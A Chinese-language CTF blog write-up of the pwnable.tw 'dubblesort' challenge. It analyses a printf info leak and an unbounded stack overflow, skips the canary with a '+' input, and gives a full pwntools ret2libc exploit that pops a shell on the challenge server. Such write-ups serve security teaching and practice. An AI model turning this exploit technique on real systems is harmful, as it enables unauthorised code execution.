
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>pwnable.tw dubblesort wp | p1Kk&#39;s World!</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="p1Kk">
    

    
    <meta name="description" content="dubblesort分析保护全开，运行一下就会发现存在泄露  看着ida代码似乎没什么问题，但是printf打印信息是通过\x00截断的，而name是通过read读取的，read通过输入字符的回车就截断了，如果这个回车后面不是00，printf就会一起打印出来，不过name只能输入0x40大小，还没有到达canary的值，但是可能会存在栈信息，这个后面再分析。 整个程序就是输入数字进行排序，没有限">
<meta name="keywords" content="pwn,wp,tw">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.tw dubblesort wp">
<meta property="og:url" content="p1Kk.github.io/2020/07/09/tw/tw dubblesort/index.html">
<meta property="og:site_name" content="p1Kk&#39;s World!">
<meta property="og:description" content="dubblesort分析保护全开，运行一下就会发现存在泄露  看着ida代码似乎没什么问题，但是printf打印信息是通过\x00截断的，而name是通过read读取的，read通过输入字符的回车就截断了，如果这个回车后面不是00，printf就会一起打印出来，不过name只能输入0x40大小，还没有到达canary的值，但是可能会存在栈信息，这个后面再分析。 整个程序就是输入数字进行排序，没有限">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/dubblerun.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/numbersize.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/sortvmmap.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/sortoffsewt.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/SORTVM2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/readsort.png">
<meta property="og:updated_time" content="2020-07-20T13:49:24.238Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.tw dubblesort wp">
<meta name="twitter:description" content="dubblesort分析保护全开，运行一下就会发现存在泄露  看着ida代码似乎没什么问题，但是printf打印信息是通过\x00截断的，而name是通过read读取的，read通过输入字符的回车就截断了，如果这个回车后面不是00，printf就会一起打印出来，不过name只能输入0x40大小，还没有到达canary的值，但是可能会存在栈信息，这个后面再分析。 整个程序就是输入数字进行排序，没有限">
<meta name="twitter:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/dubblerun.png">

    
    <link rel="alternative" href="atom.xml" title="p1Kk&#39;s World!" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/site.jpg">
    
    
    <link rel="apple-touch-icon" href="/img/head.png">
    <link rel="apple-touch-icon-precomposed" href="/img/head.png">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo2.jpg" alt="p1Kk&#39;s World!" title="p1Kk&#39;s World!"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="p1Kk&#39;s World!">p1Kk&#39;s World!</a></h1>
				<h2 class="blog-motto">艺无止境，功不唐捐。</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/tags">Tags</a></li>
					
						<li><a href="/categories">Categories</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:p1Kk.github.io">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	
	  <article itemprop="articleBody"> 
		  <header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2020/07/09/tw/tw dubblesort/" title="pwnable.tw dubblesort wp" itemprop="url">pwnable.tw dubblesort wp</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="p1Kk" target="_blank" itemprop="author">p1Kk</a>
		
  <p class="article-time">
    <time datetime="2020-07-08T16:00:00.000Z" itemprop="datePublished"> Published 2020-07-09</time>
    
  </p>
</header>
	  <div class="article-content">
		  
		  <div id="toc" class="toc-article">
			  <strong class="toc-title">Contents</strong>
		  
			  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#dubblesort"><span class="toc-number">1.</span> <span class="toc-text">dubblesort</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#分析"><span class="toc-number">1.1.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">1.2.</span> <span class="toc-text">exp</span></a></li></ol></li></ol>
		  
		  </div>
		  
		  <h1 id="dubblesort"><a href="#dubblesort" class="headerlink" title="dubblesort"></a>dubblesort</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>保护全开，运行一下就会发现存在泄露</p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/dubblerun.png" alt></p>
<p>看着ida代码似乎没什么问题，但是printf打印信息是通过\x00截断的，而name是通过read读取的，read通过输入字符的回车就截断了，如果这个回车后面不是00，printf就会一起打印出来，不过name只能输入0x40大小，还没有到达canary的值，但是可能会存在栈信息，这个后面再分析。</p>
<p>整个程序就是输入数字进行排序，没有限制输入的多少，但是空间是有限的，可以造成溢出</p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/numbersize.png" alt></p>
<p>1.首先考虑如何绕过canary，canary的位置有点儿尴尬，所以要思考可不可以通过溢出 不改变canary。</p>
<p>如果输入非法字符，输入流不清空，非法字符一直会一直留在stdin，这样剩下的scanf读入的都是非法字符，pass。</p>
<p>所以可以通过输入<code>+</code>或<code>-</code>，因为这两个符号可以定义正负数，如果输入数字替换成这两个数字，读入只会视为无效而不是非法，canary不会被修改。</p>
<p>2.通过name处的漏洞泄露libc</p>
<p>vmmap查看libc基址</p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/sortvmmap.png" alt></p>
<p>我们输入测试数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> ECX  0xffffcfec ◂— &apos;KKKK\n&apos;</span><br><span class="line">pwndbg&gt; x/10wx 0xffffcfec</span><br><span class="line">0xffffcfec:	0x4b4b4b4b	0x0000000a	0xffffd2ad	0xf7e0c4a9</span><br><span class="line">0xffffcffc:	0xf7fb7748	0xf7fb4000	0xf7fb4000	0x00000000</span><br><span class="line">0xffffd00c:	0x56555601	0x565557a9</span><br></pre></td></tr></table></figure>

<p>在&amp;name+12处的<code>0xf7e0c4a9</code>是libc处的地址，<code>0xf7e0c4a9-0xf7ddc000=0x304A9</code>，就是泄露地址和libc基址的偏移了（但是这只是本地测试结果，并不能用于远程）</p>
<p>还可以有其他思路，比如</p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/sortoffsewt.png" alt></p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/SORTVM2.png" alt></p>
<p><code>0xf7fb4000-0xf7ddc000=0x1d8000</code>，也就是.got.plt相对于libc的偏移</p>
<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/readsort.png" alt></p>
<p>所以我们可以利用给定的libc来查找.got.plt偏移等等…</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">#!usr/bin/python</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line"></span><br><span class="line">binary = &quot;./dubblesort&quot;</span><br><span class="line">ip = &quot;chall.pwnable.tw&quot;</span><br><span class="line">port = 10101</span><br><span class="line">elf = ELF(binary)</span><br><span class="line"></span><br><span class="line"># offset = 0x304A9</span><br><span class="line">offset = 0x1b0000</span><br><span class="line"></span><br><span class="line">def number(num):</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(num))</span><br><span class="line"></span><br><span class="line">def pwn(ip, port, debug):</span><br><span class="line">	global io</span><br><span class="line">	if debug == 1:</span><br><span class="line">		io = process(binary)</span><br><span class="line">		libc = ELF(&quot;/lib/i386-linux-gnu/libc.so.6&quot;)	</span><br><span class="line">		# gdb.attach(io)</span><br><span class="line">	else:</span><br><span class="line">		io = remote(ip, port)</span><br><span class="line">		libc = ELF(&quot;libc_32.so.6&quot;)</span><br><span class="line">	</span><br><span class="line">	io.recvuntil(&quot; :&quot;)</span><br><span class="line">	&apos;&apos;&apos;</span><br><span class="line">	io.send(&apos;k&apos;*12)</span><br><span class="line">	io.recvuntil(&apos;k&apos;*12)</span><br><span class="line">	libc_base = u32(io.recv(4)) - offset</span><br><span class="line">	&apos;&apos;&apos;</span><br><span class="line">	io.sendline(&apos;k&apos;*0x18)</span><br><span class="line">	io.recvuntil(&apos;\x0a&apos;)</span><br><span class="line">	libc_base = u32(io.recv(3).rjust(4, &apos;\x00&apos;)) - offset</span><br><span class="line">	</span><br><span class="line">	print &quot;libc_base = &quot;+hex(libc_base)</span><br><span class="line">	sys_addr = libc_base + libc.sym[&apos;system&apos;]</span><br><span class="line">	binsh_addr = libc_base + libc.search(&apos;/bin/sh\x00&apos;).next()</span><br><span class="line">	</span><br><span class="line">	io.recvuntil(&quot; :&quot;)</span><br><span class="line">	io.sendline(str(0x18+1+9+1))</span><br><span class="line">	for i in range(0x18):</span><br><span class="line">		number(1)</span><br><span class="line">	</span><br><span class="line">	number(&apos;+&apos;)		# canary</span><br><span class="line">	</span><br><span class="line">	for i in range(9):</span><br><span class="line">		number(sys_addr)</span><br><span class="line">	</span><br><span class="line">	number(binsh_addr)</span><br><span class="line">	</span><br><span class="line">	io.interactive()</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">	pwn(ip, port, 0)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参考：<a href="https://www.freebuf.com/articles/others-articles/134271.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/others-articles/134271.html</a></p>
</blockquote>
  
	  </div>
		  <footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/oj/">oj</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/pwn/">pwn</a><a href="/tags/wp/">wp</a><a href="/tags/tw/">tw</a>
  </div>

</div>



</footer>

   	       
	  </article>
	  
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2020/07/09/tw/tw bullet/" title="pwnable.tw silver_bullet wp">
  <span>
  pwnable.tw silver_bullet wp</span>
</a>
</div>


<div class="next">
<a href="/2020/07/09/tw/tw hacknote/"  title="pwnable.tw hacknote wp">
 <span>pwnable.tw hacknote wp
</span>
</a>
</div>

</nav>

	  

</div> 
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">
<div id="authorInfo">
	
		<div class="author-img"></div>		
	
	<div class="social-info" class="clearfix">
		
		<a href="http://weibo.com/https://weibo.com/u/5213203661?refer_flag=0000015010_&amp;from=feed&amp;loc=nickname" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/p1Kk" target="_blank" class="icon-github" title="github"></a>
		
		
		
		
		
		
		
		
		
		
		<a href="mailto:p1kk_wang@qq.com" target="_blank" class="icon-email" title="Email Me"></a>
		

	</div>
</div>

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ACM/" title="ACM">ACM<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/CTF/" title="CTF">CTF<sup>4</sup></a></li>
		  
		
		  
			<li><a href="/categories/oj/" title="oj">oj<sup>17</sup></a></li>
		  
		
		  
			<li><a href="/categories/笔记/" title="笔记">笔记<sup>21</sup></a></li>
		  
		
		  
			<li><a href="/categories/面经/" title="面经">面经<sup>1</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/pwn/" title="pwn">pwn<sup>33</sup></a></li>
			
		
			
				<li><a href="/tags/wp/" title="wp">wp<sup>21</sup></a></li>
			
		
			
				<li><a href="/tags/笔记/" title="笔记">笔记<sup>17</sup></a></li>
			
		
			
				<li><a href="/tags/tw/" title="tw">tw<sup>13</sup></a></li>
			
		
			
				<li><a href="/tags/堆/" title="堆">堆<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/iot/" title="iot">iot<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/栈/" title="栈">栈<sup>3</sup></a></li>
			
		
			
				<li><a href="/tags/栈溢出/" title="栈溢出">栈溢出<sup>3</sup></a></li>
			
		
			
				<li><a href="/tags/环境搭建/" title="环境搭建">环境搭建<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/攻防世界/" title="攻防世界">攻防世界<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/ubuntu18/" title="ubuntu18">ubuntu18<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/面经/" title="面经">面经<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/AWD/" title="AWD">AWD<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/canary/" title="canary">canary<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/IO/" title="IO">IO<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/java/" title="java">java<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/HDU/" title="HDU">HDU<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/C/" title="C++">C++<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">Links</p>
    <ul>
        
          <li>
            
            	<a href="https://whali3n51.github.io" target="_blank" title="whali3n51">whali3n51</a>
            
          </li>
        
    </ul>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	

	<p class="copyright">
	Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/hsihohuang/kiddochan" target="_blank" title="Kiddochan">Kiddochan</a> © 2020 
	
	<a href="/about" target="_blank" title="p1Kk">p1Kk</a>
	
	
	</p>
</div></footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
